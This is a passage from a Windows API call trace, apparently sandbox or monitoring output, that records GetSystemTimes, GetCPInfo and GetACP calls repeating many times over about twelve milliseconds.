lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.404] GetACP () returned 0x4e4 [0120.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.405] GetACP () returned 0x4e4 [0120.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.405] GetACP () returned 0x4e4 [0120.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.405] GetACP () returned 0x4e4 [0120.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.405] GetACP () returned 0x4e4 [0120.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.405] GetACP () returned 0x4e4 [0120.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.405] GetACP () returned 0x4e4 [0120.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.405] GetACP () returned 0x4e4 [0120.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.406] GetACP () returned 0x4e4 [0120.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.406] GetACP () returned 0x4e4 [0120.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.406] GetACP () returned 0x4e4 [0120.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.406] GetACP () returned 0x4e4 [0120.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.406] GetACP () returned 0x4e4 [0120.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.407] GetACP () returned 0x4e4 [0120.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.407] GetACP () returned 0x4e4 [0120.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.407] GetACP () returned 0x4e4 [0120.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.407] GetACP () returned 0x4e4 [0120.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.407] GetACP () returned 0x4e4 [0120.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.407] GetACP () returned 0x4e4 [0120.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.408] GetACP () returned 0x4e4 [0120.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.408] GetACP () returned 0x4e4 [0120.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.408] GetACP () returned 0x4e4 [0120.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.408] GetACP () returned 0x4e4 [0120.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.408] GetACP () returned 0x4e4 [0120.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.408] GetACP () returned 0x4e4 [0120.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.408] GetACP () returned 0x4e4 [0120.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.409] GetACP () returned 0x4e4 [0120.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.409] GetACP () returned 0x4e4 [0120.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.409] GetACP () returned 0x4e4 [0120.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.409] GetACP () returned 0x4e4 [0120.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.409] GetACP () returned 0x4e4 [0120.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.409] GetACP () returned 0x4e4 [0120.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.409] GetACP () returned 0x4e4 [0120.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.410] GetACP () returned 0x4e4 [0120.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.410] GetACP () returned 0x4e4 [0120.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.410] GetACP () returned 0x4e4 [0120.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.410] GetACP () returned 0x4e4 [0120.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.410] GetACP () returned 0x4e4 [0120.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.410] GetACP () returned 0x4e4 [0120.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.411] GetACP () returned 0x4e4 [0120.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.411] GetACP () returned 0x4e4 [0120.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.411] GetACP () returned 0x4e4 [0120.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.411] GetACP () returned 0x4e4 [0120.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.411] GetACP () returned 0x4e4 [0120.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.411] GetACP () returned 0x4e4 [0120.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.411] GetACP () returned 0x4e4 [0120.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.412] GetACP () returned 0x4e4 [0120.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.412] GetACP () returned 0x4e4 [0120.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.412] GetACP () returned 0x4e4 [0120.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.412] GetACP () returned 0x4e4 [0120.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.412] GetACP () returned 0x4e4 [0120.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.412] GetACP () returned 0x4e4 [0120.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.412] GetACP () returned 0x4e4 [0120.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.413] GetACP () returned 0x4e4 [0120.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.413] GetACP () returned 0x4e4 [0120.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.413] GetACP () returned 0x4e4 [0120.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.413] GetACP () returned 0x4e4 [0120.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.413] GetACP () returned 0x4e4 [0120.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.413] GetACP () returned 0x4e4 [0120.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.413] GetACP () returned 0x4e4 [0120.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.414] GetACP () returned 0x4e4 [0120.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.414] GetACP () returned 0x4e4 [0120.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.414] GetACP () returned 0x4e4 [0120.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.414] GetACP () returned 0x4e4 [0120.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.414] GetACP () returned 0x4e4 [0120.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.414] GetACP () returned 0x4e4 [0120.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.415] GetACP () returned 0x4e4 [0120.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.415] GetACP () returned 0x4e4 [0120.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.415] GetACP () returned 0x4e4 [0120.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.415] GetACP () returned 0x4e4 [0120.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.415] GetACP () returned 0x4e4 [0120.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.415] GetACP () returned 0x4e4 [0120.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.415] GetACP () returned 0x4e4 [0120.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.416] GetACP () returned 0x4e4 [0120.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.416] GetACP () returned 0x4e4 [0120.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.416] GetACP () returned 0x4e4 [0120.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.416] GetCPInfo (in: 